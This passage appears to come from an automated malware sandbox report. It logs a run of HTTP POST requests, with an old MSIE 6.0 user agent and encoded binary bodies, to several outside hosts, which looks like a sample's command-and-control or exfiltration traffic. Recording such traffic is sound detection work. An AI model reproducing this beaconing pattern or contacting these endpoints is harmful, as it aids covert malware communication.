49 46 79 70 4c 4d 44 6a 50 33 54 74 4d 34 71 56 31 41 6f 6c 54 56 37 70 6c 44 4c 55 77 79 4c 65 6b 6f 32 4d 7a 37 6b 30 6d 70 77 42 71 30 74 68 5a 74 75 4d 32 4b 6d 4f 6a 70 58 65 71 59 64 4d 4e 51 6f 76 6a 64 65 64 30 46 58 76 66 76 47 4e 4a 45 4c 4a 49 65 6c 59 32 66 45 44 58 31 6e 34 35 37 55 79 76 76 4f 32 4f 34 46 53 56 33 6e 2b 72 79 64 77 78 69 52 65 76 6d 64 61 59 65 4c 56 6a 67 35 64 6e 2b 79 62 33 31 78 55 33 51 55 3d Data Ascii: gkjIjFYJHdBYEgWrMbAGSfk4pt72qZaI6pJ+LnhE+LzrovcOsMSNQUbFSFusJYB98IAQ9s61+SuPCr9i8elD/2yHjAWaa12yoVC4I/4ZM6QPqx4ZP2IWm55LwrA38LsfPCOFq2Qb625DpJQZBjHvXo2iVcVegarSX73Asswlq5fA1ZIYmgJu1P4LiYVzRyYAprcJwWCmBPZA6QqQySZ1nOo/CsIU2aWCRuZsbsPCtp//S0Tnyl803bayBQKjj9CYGD/pw8xVBegDHHJLZbiz+P7AQ4zfLQ2xk7gq7DBjhvRyBnwZ719cci/itvbiKYLD6A0jzVCsMrncfvgPXHflz1GEW8yf7hpEKNamun0uY1gRIiUzGuBA3JWRFgiY7EW6IFypLMDjP3TtM4qV1AolTV7plDLUwyLeko2Mz7k0mpwBq0thZtuM2KmOjpXeqYdMNQovjded0FXvfvGNJELJIelY2fEDX1n457UyvvO2O4FSV3n+rydwxiRevmdaYeLVjg5dn+yb31xU3QU=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 528User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.evcpa.comCache-Control: no-cacheData Raw: 67 6b 6a 49 6a 46 59 4a 48 64 42 59 45 67 57 72 4d 62 41 47 53 66 6b 34 70 74 37 32 71 5a 61 49 36 70 4a 2b 4c 6e 68 45 2b 4c 7a 72 6f 76 63 4f 73 4d 53 4e 51 55 62 46 53 46 75 73 4a 59 42 39 38 49 41 51 39 73 36 31 2b 53 75 50 43 72 39 69 38 65 6c 44 2f 32 79 48 6a 41 57 61 61 31 32 79 6f 56 43 34 49 2f 34 5a 4d 36 51 50 71 78 34 5a 50 32 49 57 6d 35 35 4c 77 72 41 33 38 4c 73 66 50 43 4f 46 71 32 51 62 36 32 35 44 70 4a 51 5a 42 6a 48 76 58 6f 32 69 56 63 56 65 67 61 72 53 58 37 33 41 73 73 77 6c 71 35 66 41 31 5a 49 59 6d 67 4a 75 31 50 34 4c 69 59 56 7a 52 79 59 41 70 72 63 4a 77 57 43 6d 42 50 5a 41 36 51 71 51 79 53 5a 31 6e 4f 6f 2f 43 73 49 55 32 61 57 43 52 75 5a 73 62 73 50 43 74 70 2f 2f 53 30 54 6e 79 6c 38 30 33 62 61 79 42 51 4b 6a 6a 39 43 59 47 44 2f 70 77 38 78 56 42 65 67 44 48 48 4a 4c 5a 62 69 7a 2b 50 37 41 51 34 7a 66 4c 51 32 78 6b 37 67 71 37 44 42 6a 68 76 52 79 42 6e 77 5a 37 31 39 63 63 69 2f 69 74 76 62 69 4b 59 4c 44 36 41 30 6a 7a 56 43 73 4d 72 6e 63 66 76 67 50 58 48 66 6c 7a 31 47 45 57 38 79 66 37 68 70 45 4b 4e 61 6d 75 6e 30 75 59 31 67 52 49 69 55 7a 47 75 42 41 33 4a 57 52 46 67 69 59 37 45 57 36 49 46 79 70 4c 4d 44 6a 50 33 54 74 4d 34 71 56 31 41 6f 6c 54 56 37 70 6c 44 4c 55 77 79 4c 65 6b 6f 32 4d 7a 37 6b 30 6d 70 77 42 71 30 74 68 5a 74 75 4d 32 4b 6d 4f 6a 70 58 65 71 59 64 4d 4e 51 6f 76 6a 64 65 64 30 46 58 76 66 76 47 4e 4a 45 4c 4a 49 65 6c 59 32 66 45 44 58 31 6e 34 35 37 55 79 76 76 4f 32 4f 34 46 53 56 33 6e 2b 72 79 64 77 78 69 52 65 76 6d 64 61 59 65 4c 56 6a 67 35 64 6e 2b 79 62 33 31 78 55 33 51 55 3d Data Ascii: gkjIjFYJHdBYEgWrMbAGSfk4pt72qZaI6pJ+LnhE+LzrovcOsMSNQUbFSFusJYB98IAQ9s61+SuPCr9i8elD/2yHjAWaa12yoVC4I/4ZM6QPqx4ZP2IWm55LwrA38LsfPCOFq2Qb625DpJQZBjHvXo2iVcVegarSX73Asswlq5fA1ZIYmgJu1P4LiYVzRyYAprcJwWCmBPZA6QqQySZ1nOo/CsIU2aWCRuZsbsPCtp//S0Tnyl803bayBQKjj9CYGD/pw8xVBegDHHJLZbiz+P7AQ4zfLQ2xk7gq7DBjhvRyBnwZ719cci/itvbiKYLD6A0jzVCsMrncfvgPXHflz1GEW8yf7hpEKNamun0uY1gRIiUzGuBA3JWRFgiY7EW6IFypLMDjP3TtM4qV1AolTV7plDLUwyLeko2Mz7k0mpwBq0thZtuM2KmOjpXeqYdMNQovjded0FXvfvGNJELJIelY2fEDX1n457UyvvO2O4FSV3n+rydwxiRevmdaYeLVjg5dn+yb31xU3QU=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.kernsafe.comCache-Control: no-cacheData Raw: 74 68 66 43 46 79 63 74 4d 74 41 52 2f 6f 78 62 31 73 6a 48 4e 66 44 35 4d 53 4b 64 72 4f 4e 39 53 37 4f 53 6c 50 4e 76 51 49 4c 37 78 47 76 64 48 74 69 55 63 45 4e 37 34 6a 6a 34 6c 6e 31 33 4b 59 5a 74 6c 45 5a 65 49 50 31 52 4f 6b 38 34 57 74 6d 61 75 2f 2f 7a 52 71 43 55 4c 6b 4c 37 33 67 46 52 72 71 73 36 31 71 50 76 52 69 4c 6c 55 4a 70 6b 6a 59 59 34 57 64 6c 6e 59 69 65 76 39 52 56 78 43 4a 78 58 4e 2b 62 64 38 4d 31 4a 4a 70 57 38 42 74 4f 63 44 51 31 55 50 45 48 56 53 65 34 4c 57 42 65 45 52 4c 46 54 33 42 71 49 5a 4f 41 63 52 6c 50 64 49 4e 46 63 77 31 5a 69 4d 59 48 73 54 75 4f 6a 63 39 34 56 2f 6b 6a 4b 4b 34 4e 45 43 58 53 73 7a 68 4e 2f 6f 43 50 66 6b 57 4c 42 44 39 77 67 75 44 58 4e 4f 6b 77 43 45 6d 76 6c 63 55 62 49 66 44 39 4c 45 54 6c 31 2b 42 31 53 53 59 31 44 50 73 4c 66 72 46 43 4f 4e 31 57 32 75 7a 41 66 64 75 4b 72 47 65 48 4a 64 54 50 56 69 2b 68 4c 41 47 34 76 4b 76 2b 6a 54 65 49 74 33 7a 31 30 51 4e 61 54 65 56 68 68 73 76 76 78 4a 49 4d 5a 63 36 50 55 77 6d 50 4f 75 34 67 68 6d 71 53 70 55 43 6b 2b 51 32 4e 70 47 4b 66 4c 6d 7a 64 6f 50 59 36 57 71 74 32 74 7a 4a 62 55 4a 46 4a 35 35 58 66 58 79 36 38 49 71 71 66 50 43 35 73 77 76 55 79 56 78 58 4d 46 6e 34 38 6e 6a 7a 39 74 61 30 55 74 42 6a 78 68 36 50 47 7a 59 38 54 61 7a 71 79 46 61 6c 6d 4f 65 6e 78 79 4c 6e 2b 4c 35 53 45 72 38 48 75 4d 62 43 45 74 77 37 59 30 44 59 69 54 71 74 70 6f 38 4d 73 79 77 42 4e 57 4f 63 42 6d 57 79 48 76 59 67 55 6f 35 2f 75 66 61 45 52 6b 68 63 43 6b 56 57 69 4a 38 4c 61 75 34 65 69 4c 4e 6c 36 73 65 7a 53 62 7a 67 42 76 4d 46 62 61 68 63 55 62 76 34 78 47 6e 6d 4b 56 50 45 70 35 59 67 3d 3d Data Ascii: thfCFyctMtAR/oxb1sjHNfD5MSKdrON9S7OSlPNvQIL7xGvdHtiUcEN74jj4ln13KYZtlEZeIP1ROk84Wtmau//zRqCULkL73gFRrqs61qPvRiLlUJpkjYY4WdlnYiev9RVxCJxXN+bd8M1JJpW8BtOcDQ1UPEHVSe4LWBeERLFT3BqIZOAcRlPdINFcw1ZiMYHsTuOjc94V/kjKK4NECXSszhN/oCPfkWLBD9wguDXNOkwCEmvlcUbIfD9LETl1+B1SSY1DPsLfrFCON1W2uzAfduKrGeHJdTPVi+hLAG4vKv+jTeIt3z10QNaTeVhhsvvxJIMZc6PUwmPOu4ghmqSpUCk+Q2NpGKfLmzdoPY6Wqt2tzJbUJFJ55XfXy68IqqfPC5swvUyVxXMFn48njz9ta0UtBjxh6PGzY8TazqyFalmOenxyLn+L5SEr8HuMbCEtw7Y0DYiTqtpo8MsywBNWOcBmWyHvYgUo5/ufaERkhcCkVWiJ8Lau4eiLNl6sezSbzgBvMFbahcUbv4xGnmKVPEp5Yg==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ora.ecnet.jpCache-Control: no-cacheData Raw: 6d 4e 6b 4c 6a 74 63 54 48 64 42 62 39 48 61 69 78 70 2f 50 55 79 43 45 71 38 55 4e 67 63 36 32 2b 7a 54 33 74 77 65 56 47 74 6e 74 56 37 5a 58 4e 4a 4f 48 4e 41 46 48 31 67 71 4a 74 43 39 70 78 36 32 6e 36 68 36 4e 68 50 79 52 39 6c 4a 62 46 63 6b 70 6e 41 48 77 57 64 2b 5a 2b 52 33 6a 45 65 49 53 76 74 6d 7a 48 71 4f 62 69 76 51 72 65 69 73 31 32 45 4b 54 61 72 45 43 2b 53 6a 64 73 51 49 55 2f 70 43 72 73 71 73 30 64 67 75 5a 79 6d 53 46 39 30 47 49 73 32 76 41 50 39 69 35 2b 4c 74 6d 65 45 68 7a 77 74 78 68 68 34 2f 72 37 32 57 39 4b 62 75 4a 78 74 7a 62 47 63 4a 58 47 6f 54 67 44 31 34 57 34 4e 75 6f 51 36 69 2b 76 48 7a 77 51 6c 41 36 53 79 6a 70 68 77 51 6a 69 76 61 6c 63 47 68 67 42 2b 49 67 54 30 51 41 6f 57 79 79 63 68 78 7a 56 67 4f 48 4e 4f 54 6a 61 31 48 6a 71 79 38 6c 62 42 51 41 35 70 4c 79 50 55 6c 4b 6f 30 44 2f 6f 68 54 6f 34 76 63 55 4d 32 2b 72 46 4e 78 65 45 46 4a 72 34 41 6a 70 57 37 52 49 49 54 6a 4c 32 4f 51 64 36 79 68 6b 57 48 4d 52 45 62 71 36 47 58 68 4b 36 64 6b 72 52 34 31 36 37 46 4f 53 75 6c 4e 32 52 63 2b 59 67 45 34 78 6c 33 77 79 67 51 38 56 78 48 74 72 77 63 61 50 6c 48 6d 68 63 30 59 34 64 54 33 71 2b 6e 5a 4e 41 52 69 54 37 46 45 30 51 37 44 56 58 38 54 43 67 45 4a 53 6f 37 38 36 7a 66 37 4d 6c 6f 6c 72 53 47 57 66 59 34 4c 61 43 71 66 46 54 6b 42 6d 77 34 75 4c 6d 69 52 57 33 46 38 49 32 36 47 46 45 4b 4a 67 41 66 76 44 79 79 4b 74 30 55 31 73 59 52 6c 32 33 79 55 79 67 70 46 54 45 4b 68 47 57 71 4e 35 48 33 79 6e 41 62 65 39 42 44 32 63 78 44 78 43 42 51 74 42 55 33 67 42 47 41 58 73 56 44 67 50 34 6b 49 43 66 66 45 4b 54 61 4b 4b 43 49 46 6a 35 2b 4e 68 Data Ascii: mNkLjtcTHdBb9Haixp/PUyCEq8UNgc62+zT3tweVGtntV7ZXNJOHNAFH1gqJtC9px62n6h6NhPyR9lJbFckpnAHwWd+Z+R3jEeISvtmzHqObivQreis12EKTarEC+SjdsQIU/pCrsqs0dguZymSF90GIs2vAP9i5+LtmeEhzwtxhh4/r72W9KbuJxtzbGcJXGoTgD14W4NuoQ6i+vHzwQlA6SyjphwQjivalcGhgB+IgT0QAoWyychxzVgOHNOTja1Hjqy8lbBQA5pLyPUlKo0D/ohTo4vcUM2+rFNxeEFJr4AjpW7RIITjL2OQd6yhkWHMREbq6GXhK6dkrR4167FOSulN2Rc+YgE4xl3wygQ8VxHtrwcaPlHmhc0Y4dT3q+nZNARiT7FE0Q7DVX8TCgEJSo786zf7MlolrSGWfY4LaCqfFTkBmw4uLmiRW3F8I26GFEKJgAfvDyyKt0U1sYRl23yUygpFTEKhGWqN5H3ynAbe9BD2cxDxCBQtBU3gBGAXsVDgP4kICffEKTaKKCIFj5+Nh
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.nelipak.nlCache-Control: no-cacheData Raw: 36 76 54 54 70 51 5a 36 4c 74 41 38 33 59 4c 65 49 59 6e 2f 50 53 6e 64 4b 4b 56 6d 55 46 53 7a 6d 6e 34 39 61 43 52 2f 49 33 79 61 4b 58 7a 66 32 31 62 52 4b 5a 64 52 52 73 35 42 32 4d 44 32 4d 31 62 65 51 71 6e 49 69 4e 43 4a 67 61 4c 34 66 73 6e 4e 4d 46 6b 39 42 49 77 38 71 70 4b 53 39 6d 46 49 56 50 50 55 55 4b 5a 50 61 70 70 49 59 49 72 6c 75 59 50 65 37 62 6c 75 2b 43 4f 4b 44 32 33 5a 46 61 44 64 6a 62 41 43 4c 74 54 6b 64 39 34 69 53 73 70 68 6c 42 4b 58 4d 62 4f 6f 58 55 34 33 53 73 58 67 7a 39 4c 6c 4d 57 54 71 63 69 62 61 4b 30 71 6c 48 47 45 5a 6d 32 6e 4e 67 6b 6b 53 56 45 36 6c 52 30 53 64 79 55 77 4f 5a 54 4b 48 75 33 6a 4d 42 31 73 67 64 30 45 51 56 6d 2b 74 45 77 30 55 2b 42 33 56 75 4e 55 6b 43 71 72 6a 2f 6c 43 32 54 58 4f 34 58 52 49 72 4f 55 75 45 73 2b 45 64 71 73 70 4e 35 71 75 51 47 52 59 7a 49 35 61 62 36 37 6b 47 44 42 51 47 72 46 61 45 76 43 44 76 49 44 45 48 64 2f 39 78 78 6c 43 69 69 57 70 38 74 52 33 77 44 6a 38 56 41 76 6a 74 6d 48 4a 69 48 4c 55 52 4b 32 39 4e 75 4b 32 59 6c 4f 74 39 35 6c 31 47 48 61 49 62 6f 56 5a 4a 72 67 32 5a 4c 6b 78 48 6a 6b 6c 6d 72 51 58 49 64 4a 76 32 4d 53 6b 6c 56 39 4c 50 32 34 75 6e 75 66 70 6a 30 42 63 38 6a 5a 77 42 6d 65 35 2b 70 44 31 71 46 38 63 73 7a 68 55 35 63 74 74 73 72 73 66 33 2b 32 7a 42 2f 2b 73 2b 78 68 67 42 52 61 79 38 44 6d 72 56 52 38 4e 57 41 64 6c 64 50 55 6f 35 56 34 2f 2b 37 38 53 47 34 59 4f 62 50 6e 39 67 55 68 65 36 59 76 57 42 36 4c 46 63 45 54 62 56 4c 37 31 63 6c 33 38 6c 4e 39 74 45 41 48 43 33 46 2f 58 4f 67 4e 62 65 49 65 4f 4c 68 4b 2b 47 56 35 57 71 73 57 79 54 2f 79 33 55 47 49 67 44 50 36 52 72 62 53 75 4f 7a 2f 51 74 61 34 38 61 67 64 4b 4e 77 5a 7a 4a 6f 75 58 53 33 66 50 64 74 79 45 4c 75 38 48 50 47 43 67 3d Data Ascii: 6vTTpQZ6LtA83YLeIYn/PSndKKVmUFSzmn49aCR/I3yaKXzf21bRKZdRRs5B2MD2M1beQqnIiNCJgaL4fsnNMFk9BIw8qpKS9mFIVPPUUKZPappIYIrluYPe7blu+COKD23ZFaDdjbACLtTkd94iSsphlBKXMbOoXU43SsXgz9LlMWTqcibaK0qlHGEZm2nNgkkSVE6lR0SdyUwOZTKHu3jMB1sgd0EQVm+tEw0U+B3VuNUkCqrj/lC2TXO4XRIrOUuEs+EdqspN5quQGRYzI5ab67kGDBQGrFaEvCDvIDEHd/9xxlCiiWp8tR3wDj8VAvjtmHJiHLURK29NuK2YlOt95l1GHaIboVZJrg2ZLkxHjklmrQXIdJv2MSklV9LP24unufpj0Bc8jZwBme5+pD1qF8cszhU5cttsrsf3+2zB/+s+xhgBRay8DmrVR8NWAdldPUo5V4/+78SG4YObPn9gUhe6YvWB6LFcETbVL71cl38lN9tEAHC3F/XOgNbeIeOLhK+GV5WqsWyT/y3UGIgDP6RrbSuOz/Qta48agdKNwZzJouXS3fPdtyELu8HPGCg=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.naoi-a.comCache-Control: no-cacheData Raw: 45 33 67 73 57 79 53 39 49 39 42 74 6d 44 4e 41 76 2b 59 66 68 50 66 33 77 43 4c 63 48 45 48 6e 6d 46 54 6d 65 4c 75 36 55 43 54 50 79 39 30 52 66 56 79 53 6f 48 52 52 50 32 5a 76 73 66 32 58 42 38 36 4d 58 70 58 76 61 6d 4c 4e 34 6a 6e 48 71 68 65 34 56 47 45 2b 31 46 75 4f 32 38 72 42 78 4b 67 7a 4b 55 73 31 4f 72 63 67 52 34 6f 53 58 51 47 4e 2b 75 70 66 62 76 4f 6b 2f 51 52 50 44 46 67 61 73 45 44 4b 64 52 58 53 4d 59 52 6f 51 42 36 36 61 57 5a 2f 76 49 76 75 72 44 48 47 2f 31 49 6b 58 6e 2b 74 77 70 57 63 6a 72 33 59 68 4b 79 67 72 58 6e 44 38 6b 36 6a 52 62 5a 61 32 63 6a 65 59 31 37 5a 4f 59 6f 6f 62 46 61 31 4a 55 63 6b 43 67 50 78 70 4b 72 4c 38 66 61 7a 41 66 58 6d 4d 49 78 49 35 45 47 70 72 2f 44 71 75 56 7a 6c 66 68 42 55 78 41 53 4e 68 52 66 6e 32 6e 49 2f 78 6e 6e 41 7a 70 75 4e 50 41 38 38 6e 75 78 70 6a 34 2f 4a 48 70 36 52 68 51 61 6b 4c 52 6f 57 6a 35 56 34 57 77 43 52 75 50 67 51 68 4c 55 2b 55 66 77 68 62 42 2b 59 57 2f 42 6a 68 6c 50 6c 39 62 31 57 4d 2f 50 55 56 62 45 76 32 61 39 53 77 4f 39 45 2b 79 36 4e 32 34 66 59 4a 77 4b 36 42 39 2b 41 61 6d 4b 73 41 45 72 4a 78 6f 41 35 32 44 2f 75 72 7a 61 62 77 70 50 48 63 32 54 57 72 47 35 53 30 77 73 57 31 72 37 71 47 5a 54 75 6f 6a 53 76 33 36 49 32 59 38 4d 67 2f 54 2f 46 4b 67 62 35 37 4b 79 6c 2b 45 54 78 6d 39 76 68 31 4d 36 56 66 44 2f 63 41 7a 59 76 41 4f 57 51 71 42 56 41 38 4b 4c 2b 66 41 38 2b 45 77 2b 7a 76 52 68 41 36 34 77 66 73 31 5a 55 6b 6a 71 64 66 72 49 7a 35 32 61 61 59 49 32 6c 54 55 6b 75 39 42 31 54 79 4f 51 77 4c 50 58 61 70 46 6f 79 45 7a 68 61 4d 68 64 63 77 79 56 50 5a 47 69 64 5a 74 7a 5a 74 30 6a 6f 48 4c 71 57 71 53 4a 41 33 37 4d 31 77 4d 78 7a 2f 2b 4b 49 50 45 39 57 47 66 57 46 Data Ascii: E3gsWyS9I9BtmDNAv+YfhPf3wCLcHEHnmFTmeLu6UCTPy90RfVySoHRRP2Zvsf2XB86MXpXvamLN4jnHqhe4VGE+1FuO28rBxKgzKUs1OrcgR4oSXQGN+upfbvOk/QRPDFgasEDKdRXSMYRoQB66aWZ/vIvurDHG/1IkXn+twpWcjr3YhKygrXnD8k6jRbZa2cjeY17ZOYoobFa1JUckCgPxpKrL8fazAfXmMIxI5EGpr/DquVzlfhBUxASNhRfn2nI/xnnAzpuNPA88nuxpj4/JHp6RhQakLRoWj5V4WwCRuPgQhLU+UfwhbB+YW/BjhlPl9b1WM/PUVbEv2a9SwO9E+y6N24fYJwK6B9+AamKsAErJxoA52D/urzabwpPHc2TWrG5S0wsW1r7qGZTuojSv36I2Y8Mg/T/FKgb57Kyl+ETxm9vh1M6VfD/cAzYvAOWQqBVA8KL+fA8+Ew+zvRhA64wfs1ZUkjqdfrIz52aaYI2lTUku9B1TyOQwLPXapFoyEzhaMhdcwyVPZGidZtzZt0joHLqWqSJA37M1wMxz/+KIPE9WGfWF
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.nelipak.nlCache-Control: no-cacheData Raw: 36 76 54 54 70 51 5a 36 4c 74 41 38 33 59 4c 65 49 59 6e 2f 50 53 6e 64 4b 4b 56 6d 55 46 53 7a 6d 6e 34 39 61 43 52 2f 49 33 79 61 4b 58 7a 66 32 31 62 52 4b 5a 64 52 52 73 35 42 32 4d 44 32 4d 31 62 65 51 71 6e 49 69 4e 43 4a 67 61 4c 34 66 73 6e 4e 4d 46 6b 39 42 49 77 38 71 70 4b 53 39 6d 46 49 56 50 50 55 55 4b 5a 50 61 70 70 49 59 49 72 6c 75 59 50 65 37 62 6c 75 2b 43 4f 4b 44 32 33 5a 46 61 44 64 6a 62 41 43 4c 74 54 6b 64 39 34 69 53 73 70 68 6c 42 4b 58 4d 62 4f 6f 58 55 34 33 53 73 58 67 7a 39 4c 6c 4d 57 54 71 63 69 62 61 4b 30 71 6c 48 47 45 5a 6d 32 6e 4e 67 6b 6b 53 56 45 36 6c 52 30 53 64 79 55 77 4f 5a 54 4b 48 75 33 6a 4d 42 31 73 67 64 30 45 51 56 6d 2b 74 45 77 30 55 2b 42 33 56 75 4e 55 6b 43 71 72 6a 2f 6c 43 32 54 58 4f 34 58 52 49 72 4f 55 75 45 73 2b 45 64 71 73 70 4e 35 71 75 51 47 52 59 7a 49 35 61 62 36 37 6b 47 44 42 51 47 72 46 61 45 76 43 44 76 49 44 45 48 64 2f 39 78 78 6c 43 69 69 57 70 38 74 52 33 77 44 6a 38 56 41 76 6a 74 6d 48 4a 69 48 4c 55 52 4b 32 39 4e 75 4b 32 59 6c 4f 74 39 35 6c 31 47 48 61 49 62 6f 56 5a 4a 72 67 32 5a 4c 6b 78 48 6a 6b 6c 6d 72 51 58 49 64 4a 76 32 4d 53 6b 6c 56 39 4c 50 32 34 75 6e 75 66 70 6a 30 42 63 38 6a 5a 77 42 6d 65 35 2b 70 44 31 71 46 38 63 73 7a 68 55 35 63 74 74 73 72 73 66 33 2b 32 7a 42 2f 2b 73 2b 78 68 67 42 52 61 79 38 44 6d 72 56 52 38 4e 57 41 64 6c 64 50 55 6f 35 56 34 2f 2b 37 38 53 47 34 59 4f 62 50 6e 39 67 55 68 65 36 59 76 57 42 36 4c 46 63 45 54 62 56 4c 37 31 63 6c 33 38 6c 4e 39 74 45 41 48 43 33 46 2f 58 4f 67 4e 62 65 49 65 4f 4c 68 4b 2b 47 56 35 57 71 73 57 79 54 2f 79 33 55 47 49 67 44 50 36 52 72 62 53 75 4f 7a 2f 51 74 61 34 38 61 67 64 4b 4e 77 5a 7a 4a 6f 75 58 53 33 66 50 64 74 79 45 4c 75 38 48 50 47 43 67 3d Data Ascii: 6vTTpQZ6LtA83YLeIYn/PSndKKVmUFSzmn49aCR/I3yaKXzf21bRKZdRRs5B2MD2M1beQqnIiNCJgaL4fsnNMFk9BIw8qpKS9mFIVPPUUKZPappIYIrluYPe7blu+COKD23ZFaDdjbACLtTkd94iSsphlBKXMbOoXU43SsXgz9LlMWTqcibaK0qlHGEZm2nNgkkSVE6lR0SdyUwOZTKHu3jMB1sgd0EQVm+tEw0U+B3VuNUkCqrj/lC2TXO4XRIrOUuEs+EdqspN5quQGRYzI5ab67kGDBQGrFaEvCDvIDEHd/9xxlCiiWp8tR3wDj8VAvjtmHJiHLURK29NuK2YlOt95l1GHaIboVZJrg2ZLkxHjklmrQXIdJv2MSklV9LP24unufpj0Bc8jZwBme5+pD1qF8cszhU5cttsrsf3+2zB/+s+xhgBRay8DmrVR8NWAdldPUo5V4/+78SG4YObPn9gUhe6YvWB6LFcETbVL71cl38lN9tEAHC3F/XOgNbeIeOLhK+GV5WqsWyT/y3UGIgDP6RrbSuOz/Qta48agdKNwZzJouXS3fPdtyELu8HPGCg=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.xaicom.esCache-Control: no-cacheData Raw: 73 62 57 54 7a 62 6b 55 4f 4e 42 65 33 4e 48 45 53 4c 61 61 4c 56 4a 52 51 41 75 58 4b 41 47 54 2f 56 72 67 67 61 7a 76 44 6f 61 38 72 2b 5a 64 37 6b 63 63 67 6e 6b 71 6c 30 34 59 37 61 50 73 51 43 71 63 55 66 41 43 4d 2b 50 4d 53 77 64 6d 48 43 52 46 59 6c 58 39 62 63 52 6c 36 62 56 33 4d 59 78 78 46 70 52 2b 64 62 2b 79 42 76 36 54 39 71 66 71 2f 72 57 6b 66 32 61 41 37 6e 79 39 2b 43 37 32 77 7a 37 63 32 5a 46 37 49 4c 34 78 62 70 4b 6e 6c 46 74 6e 55 61 78 42 64 39 7a 64 31 68 33 71 75 45 36 35 59 69 59 6c 4d 78 6a 58 32 56 5a 39 2b 4a 50 38 35 49 35 4a 47 71 67 51 41 47 53 6b 31 43 38 6e 69 38 5a 2f 2f 79 77 45 2b 48 53 73 54 37 37 54 49 72 76 4f 79 55 53 4b 49 59 42 72 47 6e 6b 73 73 76 50 79 48 71 42 4b 77 77 50 39 38 48 6f 62 5a 4b 79 36 36 48 51 34 77 69 74 56 64 6f 42 66 59 70 4b 6d 44 45 63 66 77 54 5a 65 65 43 72 4d 6a 32 58 32 47 70 76 34 30 49 44 44 6e 69 76 58 55 2b 73 52 69 74 32 55 62 49 73 76 61 71 59 71 51 7a 38 74 34 61 4f 6a 33 76 63 65 71 4b 2f 58 7a 7a 47 61 77 76 36 75 7a 67 4f 48 2f 57 38 49 2b 46 70 45 45 43 33 57 53 52 58 2f 47 2f 71 49 77 74 77 6c 75 79 70 6d 45 6e 38 4e 57 2f 63 4e 53 74 70 4d 44 56 6d 78 4d 74 7a 66 30 49 31 51 77 37 67 2b 4f 77 6c 51 6a 64 55 37 4d 70 75 4f 79 4c 55 55 76 53 4c 65 6d 62 4b 33 4e 32 35 67 4f 4d 35 37 4e 38 4a 5a 32 4d 45 30 6d 63 37 4f 45 4f 2f 66 58 33 2b 68 6a 7a 64 6b 6a 2b 30 6c 68 42 32 57 72 61 42 31 4d 61 2b 4b 54 64 6e 30 78 6c 2f 35 32 46 47 77 77 67 4a 56 76 63 4d 6a 4d 75 43 4d 55 52 2f 6f 54 4c 34 52 71 4c 67 2b 65 33 46 4f 63 67 56 4b 64 58 56 6e 39 73 63 42 74 54 53 5a 56 62 42 47 61 6e 76 31 64 4e 63 46 38 6a 6c 4d 69 73 65 4b 37 79 70 72 6a 69 52 52 4b 36 52 41 48 65 36 49 50 67 3d 3d Data Ascii: sbWTzbkUONBe3NHESLaaLVJRQAuXKAGT/VrggazvDoa8r+Zd7kccgnkql04Y7aPsQCqcUfACM+PMSwdmHCRFYlX9bcRl6bV3MYxxFpR+db+yBv6T9qfq/rWkf2aA7ny9+C72wz7c2ZF7IL4xbpKnlFtnUaxBd9zd1h3quE65YiYlMxjX2VZ9+JP85I5JGqgQAGSk1C8ni8Z//ywE+HSsT77TIrvOyUSKIYBrGnkssvPyHqBKwwP98HobZKy66HQ4witVdoBfYpKmDEcfwTZeeCrMj2X2Gpv40IDDnivXU+sRit2UbIsvaqYqQz8t4aOj3vceqK/XzzGawv6uzgOH/W8I+FpEEC3WSRX/G/qIwtwluypmEn8NW/cNStpMDVmxMtzf0I1Qw7g+OwlQjdU7MpuOyLUUvSLembK3N25gOM57N8JZ2ME0mc7OEO/fX3+hjzdkj+0lhB2WraB1Ma+KTdn0xl/52FGwwgJVvcMjMuCMUR/oTL4RqLg+e3FOcgVKdXVn9scBtTSZVbBGanv1dNcF8jlMiseK7yprjiRRK6RAHe6IPg==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.vexcom.comCache-Control: no-cacheData Raw: 4a 78 6c 37 79 46 33 71 4e 39 44 34 62 33 73 4f 6c 4f 69 37 2b 5a 5a 4f 79 33 4d 4c 61 51 57 5a 34 56 67 54 47 6c 41 4e 38 35 72 48 73 69 73 4b 54 75 4b 51 74 52 62 36 6a 55 7a 58 6d 57 4d 73 38 36 30 49 4f 4b 76 44 35 30 48 31 74 6f 6b 4e 69 62 56 50 39 38 63 72 79 50 61 39 43 6e 67 59 47 4c 41 73 73 6c 38 38 79 6e 6f 48 38 54 6c 37 4b 62 43 75 75 34 32 30 68 73 63 45 54 67 63 34 63 73 43 4e 5a 34 4d 37 6c 47 4d 33 4b 4c 53 43 4d 33 79 73 59 6e 6f 59 39 77 32 72 6c 5a 66 36 58 56 6a 2b 6a 70 5a 4a 49 65 4d 67 58 4a 72 30 31 32 64 78 35 50 55 42 67 52 6d 75 62 42 74 5a 54 4e 78 50 65 43 30 4e 62 4e 44 69 76 34 53 5a 6e 54 4f 4c 72 2b 76 53 72 42 73 43 59 4e 77 33 74 4a 48 70 6f 54 50 46 